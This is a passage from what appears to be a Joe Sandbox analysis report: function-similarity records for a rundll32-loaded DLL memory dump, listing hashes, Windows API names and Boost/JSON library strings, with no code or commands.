                                                                                                                      • Opcode Fuzzy Hash: 28c97f36d74b1a47469f08ade993c45906df21fe725b4018bed03fb5b85ac439
                                                                                                                      • Instruction Fuzzy Hash: 65029D33701B8889EB42CFB5E4903DC37B6A759798F458116EF896BB99DE38C619C340
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
• API String ID: 3215553584-2617248754
• Opcode ID: c9ef68fe15a0685817e053870e5daca4dfe2efa88dc6a2da75efcd8cea66df82
• Instruction ID: 72066f0b29f8277b2a9d0f30e9ba564a046d601e49a7b5146efbfedbbbc13b8a
• Opcode Fuzzy Hash: c9ef68fe15a0685817e053870e5daca4dfe2efa88dc6a2da75efcd8cea66df82
• Instruction Fuzzy Hash: 2E417C36701F48C9EB82CF65E8507CD33A5FB183C8F458526EA5817B99EE79C629D380
APIs
Memory Dump Source
• Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: Event$CloseHandle$Create$ObjectOpenResetSingleWait
• String ID:
• API String ID: 3951656645-0
• Opcode ID: af9c93ba574bc1ec99061f54b08a1be15c7d393e5603cbaa728536fe020de9dc
• Instruction ID: a4ca4c93f823217d94e31494ce8624a3760039f8ad707e5135abf709fc427eeb
• Opcode Fuzzy Hash: af9c93ba574bc1ec99061f54b08a1be15c7d393e5603cbaa728536fe020de9dc
• Instruction Fuzzy Hash: 9251963220868496EB93CBA0E55439EB7A1F78D7F4F548311FAB947AD8DF79C5488B00
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
• API String ID: 1646373207-1053001802
• Opcode ID: 47b834d62431e17e20a977250de26ae495141b3d13ed43af52be611b2e9d5c14
• Instruction ID: 963a9f0c5cad83c64c799a194dce8767f8060a1849f79d87e2b9da9312d231c1
• Opcode Fuzzy Hash: 47b834d62431e17e20a977250de26ae495141b3d13ed43af52be611b2e9d5c14
• Instruction Fuzzy Hash: 3C316C36615A4881EB93CB05E8543DA77A0E74DBD5F98C421EF8C077A4DF3AC699C704
APIs
Strings
• bad allocation, xrefs: 00000001800211B1
• C:\vcpkg\installed\x64-windows-static\include\boost/exception/detail/exception_ptr.hpp, xrefs: 0000000180021312
• class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 0000000180021307
Memory Dump Source
• Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: __std_exception_copy$__std_exception_destroy
• String ID: C:\vcpkg\installed\x64-windows-static\include\boost/exception/detail/exception_ptr.hpp$bad allocation$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
• API String ID: 3351419955-2811268555
• Opcode ID: 38fb148bf62251cd46b3e688b822faa1bb8ec711d66c6ffaa433cc5f8242a4f5
• Instruction ID: 89612ad2f0a4dbe3d37bcdf88216a6aca8c5db91f2faee7b5b62cc2b8fe9d8d9
• Opcode Fuzzy Hash: 38fb148bf62251cd46b3e688b822faa1bb8ec711d66c6ffaa433cc5f8242a4f5
• Instruction Fuzzy Hash: FBD12632701B488AEB92CF65E8803DD73B5F749B99F158126EA4D53B68EF38C658C740
APIs
Strings
• class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 0000000180021767
• bad exception, xrefs: 0000000180021611
• C:\vcpkg\installed\x64-windows-static\include\boost/exception/detail/exception_ptr.hpp, xrefs: 0000000180021772
Memory Dump Source
• Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: __std_exception_copy$__std_exception_destroy
• String ID: C:\vcpkg\installed\x64-windows-static\include\boost/exception/detail/exception_ptr.hpp$bad exception$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
• API String ID: 3351419955-1136627154
• Opcode ID: 29ae3109d19782a05870721eee5e20d4c2552882acae7008d5f6f4f657ea7566
• Instruction ID: 5d69a4a317d418ad0cd9793c46078c486c87dd547ad8dbe9c107f65695df127c
• Opcode Fuzzy Hash: 29ae3109d19782a05870721eee5e20d4c2552882acae7008d5f6f4f657ea7566
• Instruction Fuzzy Hash: 0DD13532601B488AEB92CF65E8903DD73B4F789B99F158126EE4D43768EF38C658C740
Strings
Memory Dump Source
• Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID:
• String ID: Module$[json.exception.
• API String ID: 0-4049947260
• Opcode ID: 36d6bd7ae6ad30d832d8142fd754482a29e78ae3e058fae6e904548c9c85cd86
• Instruction ID: fe7089d107aa8f68835dacd8c69746321219263d80d134f090ae36b3a29a05ef
• Opcode Fuzzy Hash: 36d6bd7ae6ad30d832d8142fd754482a29e78ae3e058fae6e904548c9c85cd86
• Instruction Fuzzy Hash: 73A18072B14B888AFB46CB79D4153DC3322E7997D8F409611EA5C27B9ADF74C289C380
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: Module$FileHandleName__report_securityfailure_invalid_parameter_noinfo
• String ID: Module$Module_Raw$REGISTRY
• API String ID: 853233465-549000027
• Opcode ID: a14a019abaa2f50d255da567a2426ae732f2bbcede54e071cb80226dfd2780e6
• Instruction ID: 731c98ac08b5e8395c75feb44ddf7eed7338f20cafd795188727a8ce6c68b874
• Opcode Fuzzy Hash: a14a019abaa2f50d255da567a2426ae732f2bbcede54e071cb80226dfd2780e6
• Instruction Fuzzy Hash: 9891BE32715B8885EB96DB20E4803EA73A0FB987D0F849511BA8E476A6DF3CC749C741
APIs
Memory Dump Source
• Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: CharNext
• String ID:
• API String ID: 3213498283-0
• Opcode ID: 8a0385260425eac13c0282f20728e3bbfc1285cc9f071ecdbaf24b125922a9d1
• Instruction ID: c5565e2f16380d72d7548de1307714f0aeebb69643ec4dea90e42c6edbedab58
• Opcode Fuzzy Hash: 8a0385260425eac13c0282f20728e3bbfc1285cc9f071ecdbaf24b125922a9d1
• Instruction Fuzzy Hash: 6C51AD32311A9985EBA2CF55E5443BA73A1F35DBC6F80C421EBC947794EE38CA99C305
APIs
• GetModuleHandleW.KERNEL32(?,?,?,?,00000000,00000000,?,?,00000000,?,0000000180006033), ref: 0000000180005B04
• GetProcAddress.KERNEL32(?,?,?,?,00000000,00000000,?,?,00000000,?,0000000180006033), ref: 0000000180005B1E
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,?,?,00000000,?,0000000180006033), ref: 0000000180005B73
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000000,?,?,00000000,?,0000000180006033), ref: 0000000180005B85
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressCloseHandleModuleOpenProc
                                                                                                                      • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                      • API String ID: 823179699-3913318428
                                                                                                                      • Opcode ID: 922714fbc4fef7bdb830a90e38b00d6c7a05fef562a286103f241e5dee24232f
                                                                                                                      • Instruction ID: 61b866c1fd90337073b630c2583ef30057e813e73abd5604f95426379a943905
                                                                                                                      • Opcode Fuzzy Hash: 922714fbc4fef7bdb830a90e38b00d6c7a05fef562a286103f241e5dee24232f
                                                                                                                      • Instruction Fuzzy Hash: D821A232306B4C86EAA7CF16E8907AA73A4F74DBD1F948025EE8D47750EF38D6588704
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                      • String ID: CONOUT$
                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                      • Opcode ID: 9179611ce3d484bf7bb4d4f21fcbf0be3f337a48b181afc3d324849406284af3
                                                                                                                      • Instruction ID: db18f07911addb29b59b596a7c76d3ab734cd9017018912672b507ce7878bdb4
                                                                                                                      • Opcode Fuzzy Hash: 9179611ce3d484bf7bb4d4f21fcbf0be3f337a48b181afc3d324849406284af3
                                                                                                                      • Instruction Fuzzy Hash: 0E11B232310B4486E7938B52E85436A77A0F78CFE5F548224FE5987794DF38C6588744
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$FreeProcess$Value
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3709577838-0
                                                                                                                      • Opcode ID: c2b7db977e228d9729f835ee7e92fe8bed6556478dabf7a88b521e16d3e3cd68
                                                                                                                      • Instruction ID: 5750590dc8374900778181883ec944de8777c21cb0820c29f01a0902723758eb
                                                                                                                      • Opcode Fuzzy Hash: c2b7db977e228d9729f835ee7e92fe8bed6556478dabf7a88b521e16d3e3cd68
                                                                                                                      • Instruction Fuzzy Hash: 01416535202B4892EE979B65D5503A9A371FB8DFE1F59C225EF6E077A4DF38C5098300
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                      • Opcode ID: c970d15527f8f6e660b5234528be61620e9f73803ea0b4106ac94b8a677c7c66
                                                                                                                      • Instruction ID: 097023b2cbdfde49c40b6fd13eaac2af1dcb66600fa14bccd34a4fbafceb32a9
                                                                                                                      • Opcode Fuzzy Hash: c970d15527f8f6e660b5234528be61620e9f73803ea0b4106ac94b8a677c7c66
                                                                                                                      • Instruction Fuzzy Hash: DCF05E71312A08C1FF878B51E8903A923A0BF8CBD1F849416B94B46564DF78C68CC754
                                                                                                                      APIs
                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 000000018001F629
                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000018001F5A7,?,?,?,000000018001B29B), ref: 000000018001F6E8
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000018001F5A7,?,?,?,000000018001B29B), ref: 000000018001F768
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2210144848-0
                                                                                                                      • Opcode ID: ae99e38dd02a7261c2c6d0b8c86bc1feb708f17d4f9d531f33e9b478c84040dc
                                                                                                                      • Instruction ID: 43e1545d8c5255d8e9e05e60bcd817678180781a84b7e28a742c8e887bc3ca2c
                                                                                                                      • Opcode Fuzzy Hash: ae99e38dd02a7261c2c6d0b8c86bc1feb708f17d4f9d531f33e9b478c84040dc
                                                                                                                      • Instruction Fuzzy Hash: 5381AC36614E0899FBA6AB6588907FD27A0F74CBD8F44C216FE0A537E6DF348649C710
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalDeleteSection
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 166494926-0
                                                                                                                      • Opcode ID: 5373f7ee083048d533c2520517f7528c1624526d471f4ab200540c9a635c08b2
                                                                                                                      • Instruction ID: dd4fd535904e7d2e3bf020242418357b7c47115a4b5646b1bba01b7941aee057
                                                                                                                      • Opcode Fuzzy Hash: 5373f7ee083048d533c2520517f7528c1624526d471f4ab200540c9a635c08b2
                                                                                                                      • Instruction Fuzzy Hash: 2B715E76205A4982EBA2CF11E4503EA73A1F748BD4F44C121FF5A87B94DF38CA99CB40
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _set_statfp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1156100317-0
                                                                                                                      • Opcode ID: c8fa3015a8f78404e409fe4dc9b2444ced030e897441c29de37c84fe9791c269
                                                                                                                      • Instruction ID: ee68135ad0318bf899fcee127a736d73ab127c04b409baee4b92e69e90382910
                                                                                                                      • Opcode Fuzzy Hash: c8fa3015a8f78404e409fe4dc9b2444ced030e897441c29de37c84fe9791c269
                                                                                                                      • Instruction Fuzzy Hash: 25118672A50F2D06F6E72124E5453EA23416F5C3F4F74C635BB76066EB8F688B494710
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                      • String ID: $*
                                                                                                                      • API String ID: 3215553584-3982473090
                                                                                                                      • Opcode ID: 9186edf46071ac7533fb7cf782ed455da096df7baf0855607552a5d5df96310d
                                                                                                                      • Instruction ID: 125fdf878ed4e9d4e426cfd5b2beb0a108ce8d10c15bd92bf3be489b5dcf0de5
                                                                                                                      • Opcode Fuzzy Hash: 9186edf46071ac7533fb7cf782ed455da096df7baf0855607552a5d5df96310d
                                                                                                                      • Instruction Fuzzy Hash: AD619572114A48CBE7FB8F2884583ED3BA1F71DB89F589115E642422D9EF34C6A9C712
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                      • String ID: -$e+000$gfff
                                                                                                                      • API String ID: 3215553584-2620144452
                                                                                                                      • Opcode ID: 89bcca44b9417b92e0e855a4c2a87eb63b9814be5d57bd85a874d2708c334544
                                                                                                                      • Instruction ID: 13859a5dffa2dfe0d72762436a3d161302fe7da5c4d514db1a47257b8f061b63
                                                                                                                      • Opcode Fuzzy Hash: 89bcca44b9417b92e0e855a4c2a87eb63b9814be5d57bd85a874d2708c334544
                                                                                                                      • Instruction Fuzzy Hash: 1151F872714BC886E7A68F39D8413D97BA1E389BD0F48D225E79847BD6DF28C648C701
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                      • String ID: type_error
                                                                                                                      • API String ID: 3668304517-1406221190
                                                                                                                      • Opcode ID: b058222c2227ea872afc5b32253dd9d732f9db9df698ff926845857dbda95bdf
                                                                                                                      • Instruction ID: 50e7e856241c09585bb2cc6510c892539a9e3a75e16386a5cbf54137d8a88b63
                                                                                                                      • Opcode Fuzzy Hash: b058222c2227ea872afc5b32253dd9d732f9db9df698ff926845857dbda95bdf
                                                                                                                      • Instruction Fuzzy Hash: C1518372615B8881FA56CB28E45539A7361FB8D7E4F509311FAAC43BDADF78C288C700
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                      • String ID: other_error
                                                                                                                      • API String ID: 3668304517-896093151
                                                                                                                      • Opcode ID: 5ba4ad6ed8a819c74eaac1de025b926ab0507947bee0665e1cccbb221e2935cc
                                                                                                                      • Instruction ID: 4fd34da277bcb81ba046d36130df483134f3035bbd1b9093707cb17488f3b066
                                                                                                                      • Opcode Fuzzy Hash: 5ba4ad6ed8a819c74eaac1de025b926ab0507947bee0665e1cccbb221e2935cc
                                                                                                                      • Instruction Fuzzy Hash: 14518F72614B8881EA56DB28E44539A7361FB897E4F50D311FAAC436EADF78C288C700
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                      • String ID: *
                                                                                                                      • API String ID: 3215553584-163128923
                                                                                                                      • Opcode ID: 0001f2f73bd4214c56874a2a435943038f335403b12da021ec391d38b407e24e
                                                                                                                      • Instruction ID: d001ba0e656f52b9c6e5173e784844ecc945baa90473546c5ec452aaff2b905b
                                                                                                                      • Opcode Fuzzy Hash: 0001f2f73bd4214c56874a2a435943038f335403b12da021ec391d38b407e24e
                                                                                                                      • Instruction Fuzzy Hash: 6E719272104A1886E7EA8F28D0443EC3BB0F30DF98F249116EF4642399EF70C6AAD754
                                                                                                                      APIs
                                                                                                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180002A64
                                                                                                                      • _CxxThrowException.LIBVCRUNTIME ref: 0000000180002AB6
                                                                                                                        • Part of subcall function 000000018000EB58: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000018000E45B), ref: 000000018000EBCD
                                                                                                                        • Part of subcall function 000000018000EB58: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000018000E45B), ref: 000000018000EBFF
                                                                                                                      Strings
